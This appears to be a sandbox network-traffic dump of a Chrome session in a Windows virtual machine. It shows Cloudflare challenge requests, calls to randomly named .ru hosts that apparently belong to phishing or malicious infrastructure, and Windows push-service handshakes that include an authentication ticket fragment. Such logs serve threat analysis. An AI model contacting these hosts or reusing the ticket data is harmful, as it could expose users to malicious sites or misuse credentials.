                                                                                              2024-12-19 13:36:18 UTC233INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 55 65 63 2b 70 47 6e 7a 61 45 76 4b 66 71 50 43 46 6e 6c 71 77 53 52 4c 63 4b 41 35 6a 7a 4e 52 30 4c 6f 51 4a 42 4e 67 33 4b 53 4e 44 55 6c 4d 75 42 6b 75 4b 42 34 6f 31 68 54 48 55 30 57 55 52 4d 6a 48 54 51 56 79 76 36 6f 41 2f 34 78 78 69 43 62 47 31 62 4a 53 46 55 4e 62 57 46 46 61 49 43 4b 50 75 61 70 4e 62 6b 6b 2b 68 2b 6b 35 45 6d 54 31 56 43 63 3d 24 6f 72 35 4b 4f 58 62 67 51 59 59 37 4f 30 72 72 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 37 63 37 65 33 61 62 65 34 31 38 63 63 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                              Data Ascii: cf-chl-out: Uec+pGnzaEvKfqPCFnlqwSRLcKA5jzNR0LoQJBNg3KSNDUlMuBkuKB4o1hTHU0WURMjHTQVyv6oA/4xxiCbG1bJSFUNbWFFaICKPuapNbkk+h+k5EmT1VCc=$or5KOXbgQYY7O0rrServer: cloudflareCF-RAY: 8f47c7e3abe418cc-EWRalt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:18 UTC1193INData Raw: 57 6d 35 71 64 34 47 47 6b 6e 75 48 64 55 68 7a 68 57 68 55 62 33 69 59 68 33 4a 5a 6d 35 65 42 70 59 2b 54 64 4a 57 6e 66 48 69 63 69 71 31 6e 6b 59 61 65 6b 4b 6d 6c 69 4b 69 35 69 36 71 75 76 59 2b 75 73 4c 57 41 77 71 33 41 67 37 4a 2f 71 4c 57 62 75 62 65 62 6e 38 53 78 6e 37 4f 4e 77 73 6e 42 6a 35 4f 6e 72 63 36 63 6e 64 2f 4e 6e 4e 79 63 6d 35 2b 65 75 64 75 61 76 75 75 6b 6e 74 6e 66 34 37 44 64 77 2b 4f 76 38 75 66 72 75 50 6a 6e 36 37 62 35 35 2b 6e 41 2f 75 2b 37 77 4f 50 5a 2b 4c 72 4a 44 4d 62 4d 77 38 77 45 77 75 67 45 44 4e 44 72 41 4d 2f 55 35 2b 30 50 32 42 76 39 46 4e 6f 50 44 66 59 54 48 65 55 65 42 52 58 6d 4a 4f 59 64 42 69 54 74 4d 51 49 71 43 41 55 41 46 53 30 78 4a 69 30 6d 4e 78 49 53 4d 44 51 66 49 52 77 38 2f 43 4e 44 51 41 6f
                                                                                              Data Ascii: Wm5qd4GGknuHdUhzhWhUb3iYh3JZm5eBpY+TdJWnfHiciq1nkYaekKmliKi5i6quvY+usLWAwq3Ag7J/qLWbubebn8Sxn7ONwsnBj5Onrc6cnd/NnNycm5+euduavuukntnf47Ddw+Ov8ufruPjn67b55+nA/u+7wOPZ+LrJDMbMw8wEwugEDNDrAM/U5+0P2Bv9FNoPDfYTHeUeBRXmJOYdBiTtMQIqCAUAFS0xJi0mNxISMDQfIRw8/CNDQAo
                                                                                              2024-12-19 13:36:18 UTC1369INData Raw: 4d 37 37 38 4f 44 74 42 51 77 4a 31 50 63 4f 31 51 63 46 31 74 30 4a 45 76 34 4f 37 67 55 67 38 68 73 52 46 43 4c 36 47 69 49 70 4c 78 77 6d 37 67 51 55 42 41 41 51 47 53 30 6d 46 69 51 4c 37 78 58 32 2b 50 31 45 4a 44 6b 54 4e 76 34 39 51 55 6b 35 44 52 38 4d 52 42 41 7a 51 6a 77 6d 49 43 5a 49 4b 55 31 4f 52 42 59 37 59 45 46 59 4c 31 70 45 57 6c 70 50 57 46 52 41 56 45 77 39 4f 55 68 66 4b 6b 78 63 58 6b 55 75 64 46 64 4b 64 6d 4e 64 54 56 6c 54 62 6d 4a 2f 58 6e 53 41 54 34 4a 70 61 59 5a 55 66 59 4f 48 58 5a 47 47 69 6d 65 49 63 35 57 50 6a 46 52 73 66 49 78 74 63 48 53 49 67 4a 6d 57 6b 33 4e 6a 64 35 57 65 66 32 68 6c 6f 6d 64 39 6f 48 46 2f 71 4b 61 44 62 34 69 71 72 59 79 6b 70 6f 79 4e 6d 4a 2b 32 6a 5a 70 37 66 72 75 77 70 37 32 6c 6d 62 7a 48
                                                                                              Data Ascii: M778ODtBQwJ1PcO1QcF1t0JEv4O7gUg8hsRFCL6GiIpLxwm7gQUBAAQGS0mFiQL7xX2+P1EJDkTNv49QUk5DR8MRBAzQjwmICZIKU1ORBY7YEFYL1pEWlpPWFRAVEw9OUhfKkxcXkUudFdKdmNdTVlTbmJ/XnSAT4JpaYZUfYOHXZGGimeIc5WPjFRsfIxtcHSIgJmWk3Njd5Wef2hlomd9oHF/qKaDb4iqrYykpoyNmJ+2jZp7fruwp72lmbzH
                                                                                              2024-12-19 13:36:18 UTC1369INData Raw: 66 55 46 77 41 49 45 78 48 6a 42 2f 77 62 2b 2b 44 38 2f 52 37 68 2b 51 67 44 35 65 67 4c 2f 42 62 6f 44 2f 73 51 4c 50 4c 6c 4e 51 6e 73 4b 41 6a 72 38 54 51 38 43 77 34 36 2b 6a 63 61 49 6a 35 48 48 77 41 4a 4a 50 78 4e 44 41 67 75 42 30 73 68 4b 55 64 51 49 55 41 50 56 45 63 36 58 56 67 39 4d 32 46 59 4e 30 4d 74 4a 42 38 2b 58 47 4a 55 61 55 46 72 53 6c 68 6d 4d 57 52 4f 61 47 52 57 54 30 5a 34 5a 33 74 45 66 48 64 70 54 6d 39 42 56 30 2b 43 50 45 52 54 50 31 2b 4c 61 31 6c 4d 6a 47 52 6d 53 30 75 45 67 56 5a 55 53 6e 42 6c 55 6c 79 5a 64 56 6c 65 6e 46 69 66 65 47 47 58 62 33 4f 44 64 32 46 32 6f 4b 56 68 5a 33 43 51 6a 71 57 4b 73 61 32 69 6d 48 4b 33 72 49 32 5a 71 4a 39 37 76 62 68 37 6b 37 2b 65 73 72 2b 63 6f 4c 32 73 69 36 6d 34 69 70 2f 49 76
                                                                                              Data Ascii: fUFwAIExHjB/wb++D8/R7h+QgD5egL/BboD/sQLPLlNQnsKAjr8TQ8Cw46+jcaIj5HHwAJJPxNDAguB0shKUdQIUAPVEc6XVg9M2FYN0MtJB8+XGJUaUFrSlhmMWROaGRWT0Z4Z3tEfHdpTm9BV0+CPERTP1+La1lMjGRmS0uEgVZUSnBlUlyZdVlenFifeGGXb3ODd2F2oKVhZ3CQjqWKsa2imHK3rI2ZqJ97vbh7k7+esr+coL2si6m4ip/Iv
                                                                                              2024-12-19 13:36:18 UTC613INData Raw: 48 37 65 76 73 41 4f 34 56 33 77 51 46 46 76 6f 59 2b 50 76 36 48 51 33 33 42 69 44 71 2b 6a 4d 54 38 2b 30 68 4a 43 33 31 4f 52 76 34 4f 54 49 76 2f 44 58 2b 4d 54 41 58 50 44 77 70 42 78 56 41 51 78 77 6c 52 41 77 4c 4c 54 4d 6c 56 69 34 35 47 54 41 38 50 56 52 56 45 55 45 32 4c 31 4e 6c 48 78 67 36 55 44 67 6d 4b 6c 35 6e 4b 45 5a 50 54 32 70 4f 55 30 56 48 65 47 68 49 51 32 5a 70 63 6e 39 4e 59 57 78 58 63 48 5a 6a 5a 46 42 42 51 6e 35 6c 6a 59 46 76 6a 6e 46 69 6a 6c 2b 43 6a 30 36 56 68 59 32 4a 69 34 6d 54 56 6c 35 2f 6e 4a 74 38 6b 59 56 67 67 4a 42 34 66 59 57 57 6f 36 2b 45 6f 71 57 71 67 70 32 57 68 59 53 73 6d 61 57 77 76 62 47 35 75 73 47 67 76 62 56 37 75 62 32 32 79 5a 69 2b 6e 34 4f 4e 6d 4a 76 43 6e 36 2f 44 77 61 6d 31 72 49 2b 5a 70 62
                                                                                              Data Ascii: H7evsAO4V3wQFFvoY+Pv6HQ33BiDq+jMT8+0hJC31ORv4OTIv/DX+MTAXPDwpBxVAQxwlRAwLLTMlVi45GTA8PVRVEUE2L1NlHxg6UDgmKl5nKEZPT2pOU0VHeGhIQ2Zpcn9NYWxXcHZjZFBBQn5ljYFvjnFijl+Cj06VhY2Ji4mTVl5/nJt8kYVggJB4fYWWo6+EoqWqgp2WhYSsmaWwvbG5usGgvbV7ub22yZi+n4ONmJvCn6/Dwam1rI+Zpb


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              31192.168.2.649826104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:20 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1491058030:1734614036:lGnvY1elWyH7EhRRkOdPFDBDdTK2Q-wX130xIM0yJB4/8f47c7718f624386/7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVv HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:20 UTC379INHTTP/1.1 404 Not Found
                                                                                              Date: Thu, 19 Dec 2024 13:36:20 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 7
                                                                                              Connection: close
                                                                                              cf-chl-out: 1pnUHYbYL+r8Er8O9gNoBbrJsF57gICvnD4=$tFityM2ac05A4ZIT
                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c7f02ba24362-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:20 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                              Data Ascii: invalid


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              32192.168.2.649833104.21.18.1324436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:21 UTC683OUTGET /jYpzYHmViExNWkcPprHooqPmcICSNRCVHESWFGPUOAJKQVZYGURNUKQYKRPKQYGKZJLMJYTGUELTF HTTP/1.1
                                                                                              Host: 9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Origin: https://e4x6.gurativez.ru
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Referer: https://e4x6.gurativez.ru/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:22 UTC910INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:36:22 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Access-Control-Allow-Origin: *
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d264Gm7ZdCO3WDlWR7JtEQVjtAQO2r9m3atSZ%2FOydMvPoHQoWvElvnTYojFdEkTZegxhznGoltGNpHCdCIaWdSyUmQ82QnJQbImx6TcxW8rL%2BIHK6%2BhYo%2F%2Fcg7zg4KK%2BLAgWrsgZSQTFPogEDXAfgLofT8z4xjwoa%2FkwEqy6ngVdNMsOplbnGBJPj0KEMGPLf6bRFzDk4h9sf9Qbig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c7fa3806c328-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1712&rtt_var=647&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1261&delivery_rate=1705607&cwnd=177&unsent_bytes=0&cid=5aa451b301da184a&ts=881&x=0"
                                                                                              2024-12-19 13:36:22 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                              Data Ascii: 11
                                                                                              2024-12-19 13:36:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              33192.168.2.649843172.67.181.2204436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:25 UTC475OUTGET /jYpzYHmViExNWkcPprHooqPmcICSNRCVHESWFGPUOAJKQVZYGURNUKQYKRPKQYGKZJLMJYTGUELTF HTTP/1.1
                                                                                              Host: 9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:26 UTC916INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:36:26 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Access-Control-Allow-Origin: *
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fF9V5hwEMp7%2FSqD0Y5h6%2F%2Bpp3XHY%2Bu9atA8tJtNexw85NKYKyNsUgnCIn6r0o%2BGxtj25MISzPvPYu0vo5U3wI7CFcQk%2FOC9S9QVhg%2FrZpaFSdKbMK8fAjJsUVk%2FAxTI4zbkakdW4a0jaSMTBgOAufFXVu9MZcr2bMcpjrQ1TQGQ%2BGMlkrtgo6ebNNh%2BAlLkpoXhnYQ3oj9TEpbOL0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c80ff9e24379-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1596&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1053&delivery_rate=1785932&cwnd=194&unsent_bytes=0&cid=51b35352a5cdf6e0&ts=884&x=0"
                                                                                              2024-12-19 13:36:26 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                              Data Ascii: 11
                                                                                              2024-12-19 13:36:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              34192.168.2.64985820.198.118.190443
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:30 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6d 78 31 72 54 65 4d 55 77 45 75 6a 7a 7a 75 6e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 35 37 62 66 65 34 66 30 63 31 62 31 38 32 32 0d 0a 0d 0a
                                                                                              Data Ascii: CNT 1 CON 305MS-CV: mx1rTeMUwEujzzun.1Context: 157bfe4f0c1b1822
                                                                                              2024-12-19 13:36:30 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                              2024-12-19 13:36:30 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6d 78 31 72 54 65 4d 55 77 45 75 6a 7a 7a 75 6e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 35 37 62 66 65 34 66 30 63 31 62 31 38 32 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75
                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: mx1rTeMUwEujzzun.2Context: 157bfe4f0c1b1822<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
                                                                                              2024-12-19 13:36:30 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6d 78 31 72 54 65 4d 55 77 45 75 6a 7a 7a 75 6e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 35 37 62 66 65 34 66 30 63 31 62 31 38 32 32 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: mx1rTeMUwEujzzun.3Context: 157bfe4f0c1b1822<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                              2024-12-19 13:36:31 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                              Data Ascii: 202 1 CON 58
                                                                                              2024-12-19 13:36:31 UTC58INData Raw: 4d 53 2d 43 56 3a 20 63 6f 39 6c 56 73 4b 45 42 30 47 6d 61 41 32 39 53 4e 74 35 77 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                              Data Ascii: MS-CV: co9lVsKEB0GmaA29SNt5wg.0Payload parsing failed.


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              35192.168.2.64991920.198.118.190443
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:49 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 31 58 30 54 5a 46 78 6a 4d 45 32 73 4e 71 48 78 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 66 38 38 34 63 64 63 32 64 32 64 32 38 36 63 0d 0a 0d 0a
                                                                                              Data Ascii: CNT 1 CON 305MS-CV: 1X0TZFxjME2sNqHx.1Context: ef884cdc2d2d286c
                                                                                              2024-12-19 13:36:49 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                              2024-12-19 13:36:49 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 31 58 30 54 5a 46 78 6a 4d 45 32 73 4e 71 48 78 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 66 38 38 34 63 64 63 32 64 32 64 32 38 36 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75
                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 1X0TZFxjME2sNqHx.2Context: ef884cdc2d2d286c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
                                                                                              2024-12-19 13:36:49 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 31 58 30 54 5a 46 78 6a 4d 45 32 73 4e 71 48 78 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 66 38 38 34 63 64 63 32 64 32 64 32 38 36 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: 1X0TZFxjME2sNqHx.3Context: ef884cdc2d2d286c<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                              2024-12-19 13:36:49 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                              Data Ascii: 202 1 CON 58
                                                                                              2024-12-19 13:36:49 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6c 69 30 79 49 6e 31 66 38 45 47 67 41 4b 6b 38 46 70 6b 71 72 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                              Data Ascii: MS-CV: li0yIn1f8EGgAKk8FpkqrA.0Payload parsing failed.


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              36192.168.2.64998620.198.118.190443
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:37:16 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 66 75 75 50 56 41 6d 78 79 55 61 34 36 65 63 30 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 35 38 64 35 34 36 37 35 34 63 38 34 33 34 34 0d 0a 0d 0a
                                                                                              Data Ascii: CNT 1 CON 305MS-CV: fuuPVAmxyUa46ec0.1Context: 758d546754c84344
                                                                                              2024-12-19 13:37:16 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
